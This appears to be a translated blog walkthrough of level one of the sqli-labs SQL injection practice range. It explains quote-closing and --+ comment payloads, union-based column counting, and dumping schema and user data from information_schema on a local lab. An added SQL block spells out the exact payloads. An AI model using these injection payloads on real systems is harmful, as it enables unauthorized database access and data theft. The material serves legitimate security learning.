When it comes to learning SQL injection, one of the best online practice ranges is the Sqli-labs series. It has more than 60 levels, I have played through quite a few of them, and the source code is a very good way to practise SQL injection hands-on.
I had been planning to start from the first level for a while. Having summarised some of the underlying principles, I am now working through the levels properly, since they cover the SQL injection material very thoroughly. The series posts are collected under: Sqli Labs series
Yes, and the header image for this series is just a low-key group of active users installing X-Wall for fun; pure entertainment, nothing serious.
On to the main text!
First open level one, then build the injection context: after http://127.0.0.1/sqli-labs-master/Less-1/ append index.php?id=1. You can also just append ?id=1 directly, because the script only needs the id parameter; as long as the parameter is present it works.
Now add the parameter.
With the parameter added, the page shows data, so we can start constructing injection payloads.
As usual, I first append and 1=1 after id=1 to check whether the page still displays correctly.
The result is as expected: the page displays correctly. Next I append and 1=2 as the error test.
The result is that nothing breaks either. That made me pause, so I first tried to work out what the underlying SQL statement probably looks like.
Then I entered a single quote ' to force an error and see what comes back.
Since I have played this a lot, one look at the error tells me where the problem is, but it may not be obvious to everyone, so I will swap the symbol that triggers the error, replacing ' with the one shown here.
Copy the error message into a text file and analyse it.
Looking at it, if you cannot see it yet, my first guess is that the SQL statement looks like this.
The "at line 1" at the end of the error only says where the parser choked; we will not analyse that part, only how to inject.
Right, I will split the SQL statement from the error above so that everyone can read it directly.
Pasted below.
Did you see it? The parameter is wrapped in single quotes, so it is treated as a string. All we have to do is supply a quote in front to close the literal, and balance the one at the back, and the query will run.
At this point you will surely think of commenting out the rest of the line. Yes, commenting it out works too. But since I play this a lot, I want to show both methods: one is closing the quote, the other is a comment.
The first is closing the quote; the second is the -- comment. Note that two dashes only act as a comment in MySQL when followed by a space, and I normally use + in place of the space in the URL, so the comment is written --+.
OK, let us test the first method and see whether it works.
With and 1=1 the page displays correctly; then I test and 1=2 again.
As expected, this time it fails.
Now test the comment method.
and 1=1 displays normally; then test and 1=2.
It fails, so from here I can basically start the real SQL injection!
Let the injection begin!
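Worked example of the reasoning above, added here and not part of the original post. The query shape is the standard sqli-labs Less-1 statement; the table and column names and the id values are assumptions for illustration. Each step shows the URL payload and the SQL the server actually ends up running, which explains why and 1=2 looked "fine" and why both the closing-quote and comment methods work.

```sql
-- Added example, not from the original post. Assumed Less-1 statement:
--   $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";   (PHP, assumed)
-- Table/column names and id values below are assumptions for illustration.

-- 1) Why "and 1=1" and "and 1=2" both looked fine: the payload lands inside
--    the string literal. MySQL compares the integer id with the string
--    '1 and 1=2', casts it to the number 1 (with a warning) and returns the
--    same row either way. No SQL logic is evaluated at all.
-- ?id=1 and 1=2
SELECT * FROM users WHERE id='1 and 1=2' LIMIT 0,1;

-- 2) Why a lone quote errors: ?id=1' closes the literal early and leaves
--    "' LIMIT 0,1" as an unterminated string, which produces the familiar
--    "near ''1'' LIMIT 0,1' at line 1" message.
--    SELECT * FROM users WHERE id='1'' LIMIT 0,1;        -- syntax error

-- 3) Method one, closing the quote: supply our own quote, then re-balance
--    the one the application appends so the statement stays well-formed.
-- ?id=1' and 1=1 and '1'='1     -> row returned
-- ?id=1' and 1=2 and '1'='1     -> no row
SELECT * FROM users WHERE id='1' and 1=2 and '1'='1' LIMIT 0,1;

-- 4) Method two, commenting out the tail: --+ decodes to "-- " (the space
--    after the dashes is mandatory in MySQL), so the application's trailing
--    quote and LIMIT clause are swallowed by the comment.
-- ?id=1' and 1=2--+
SELECT * FROM users WHERE id='1' and 1=2-- ' LIMIT 0,1
```

The key check is step 1: when a boolean test like and 1=2 changes nothing, the parameter is probably inside a quoted string, and the error from a single quote confirms it.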
First determine the number of columns. I started with order by, but even order by 100 did not error, which means that approach failed here, so I could only use union select to count instead. That gave a total of 3 columns.
Next I force a mismatch with and 1=2 followed by union select, so that the page displays our row and we can see which columns are echoed.
Then query the database name, version and user.
The user.
The database name.
The version.
Since the version is above 5.0, information_schema is available and we can query it directly.
The next step is to encode the current database name, typically as hex, so it can be referenced inside the injected query without another pair of quotes.
Then dump all the table names.
I found the users table and encoded its name the same way.
Then dump all the column names of that table.
I picked two columns and went straight for the data.
The result: nothing, and an error is reported...
Looking at the error message, I decisively switched to the comment method and commented out the rest of the statement.
And the data is dumped successfully.
OK, that is level one done.
Summary:
I know this first write-up is very detailed, but with 60-odd levels I am certainly not finished. I play these in my spare time, and once I have played more I will write the second post directly. If you are a little unfamiliar with the attack statements above, see the analysis of MySQL SQL injection attack principles in this column.
Address: MySQL Injection chapter
SQLI Labs Series - Less-1 detailed article